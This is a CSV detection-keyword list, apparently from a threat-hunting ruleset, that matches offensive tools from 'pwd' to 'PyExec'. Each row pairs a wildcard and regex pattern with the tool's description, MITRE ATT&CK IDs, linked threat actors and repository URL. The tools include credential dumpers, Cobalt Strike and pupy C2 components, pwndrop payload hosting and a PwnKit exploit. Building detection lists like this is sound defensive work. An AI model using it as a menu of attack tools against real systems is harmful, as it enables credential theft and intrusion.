"*pwd*/*/rules/best64.rule*",".{0,1000}pwd.{0,1000}\/.{0,1000}\/rules\/best64\.rule.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pwd_dump *",".{0,1000}pwd_dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*pwd|creds|cred|secret|userpw*",".{0,1000}pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*PWDump*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PWDump.*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*pwdump.exe*",".{0,1000}pwdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-PWDumpFormat*",".{0,1000}\-PWDumpFormat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*pw-inspector -*",".{0,1000}pw\-inspector\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*pw-inspector.*",".{0,1000}pw\-inspector\..{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*pwn_jenkins*",".{0,1000}pwn_jenkins.{0,1000}","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1894","320","2024-04-09T09:58:56Z","2018-07-18T14:24:27Z" "*pwn1sher/CS-BOFs*",".{0,1000}pwn1sher\/CS\-BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*pwn1sher/WMEye*",".{0,1000}pwn1sher\/WMEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*pwn3d_label = Pwn3d!*",".{0,1000}pwn3d_label\s\=\sPwn3d!.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*pwnagotchi*",".{0,1000}pwnagotchi.{0,1000}","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","7206","1125","2024-04-01T22:20:48Z","2019-09-19T13:07:15Z" "*pwnat.exe*",".{0,1000}pwnat\.exe.{0,1000}","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","3092","470","2023-12-29T19:40:28Z","2012-08-10T05:55:11Z" "*pwncat-cs *:*",".{0,1000}pwncat\-cs\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwncat-cs -lp *",".{0,1000}pwncat\-cs\s\-lp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwncat-cs ssh://*",".{0,1000}pwncat\-cs\sssh\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwndb --target @* --output *",".{0,1000}pwndb\s\-\-target\s\@.{0,1000}\s\-\-output\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PwnDexter/SharpEDRChecker*",".{0,1000}PwnDexter\/SharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*pwndrop install*",".{0,1000}pwndrop\sinstall.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop start*",".{0,1000}pwndrop\sstart.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop status*",".{0,1000}pwndrop\sstatus.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop stop*",".{0,1000}pwndrop\sstop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-linux-amd64*",".{0,1000}pwndrop\-linux\-amd64.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-master*",".{0,1000}pwndrop\-master.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwned_x64/notepad.exe*",".{0,1000}pwned_x64\/notepad\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Pwned-creds_Domainpasswordspray.txt*",".{0,1000}Pwned\-creds_Domainpasswordspray\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*pwned-passwords-ntlm*",".{0,1000}pwned\-passwords\-ntlm.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*pwnkit *",".{0,1000}pwnkit\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*pwnkit64decoded.c*",".{0,1000}pwnkit64decoded\.c.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*pwnsauc3/RWXFinder*",".{0,1000}pwnsauc3\/RWXFinder.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*pwsafe2john.py*",".{0,1000}pwsafe2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pxethief *",".{0,1000}pxethief\s.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*pxethief.py*",".{0,1000}pxethief\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*pxlib\bin\kerberos.x64.o*",".{0,1000}pxlib\\bin\\kerberos\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pycobalt.*",".{0,1000}pycobalt\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt/aggressor*",".{0,1000}pycobalt\/aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_debug_on*",".{0,1000}pycobalt_debug_on.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_path*",".{0,1000}pycobalt_path.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_python*",".{0,1000}pycobalt_python.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_timeout*",".{0,1000}pycobalt_timeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pydictor*",".{0,1000}pydictor.{0,1000}","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","3170","626","2023-12-06T13:13:38Z","2016-08-17T08:16:56Z" "*pyexec -c *",".{0,1000}pyexec\s\-c\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pyexec --file*",".{0,1000}pyexec\s\-\-file.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PyExec-main.*",".{0,1000}PyExec\-main\..{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" 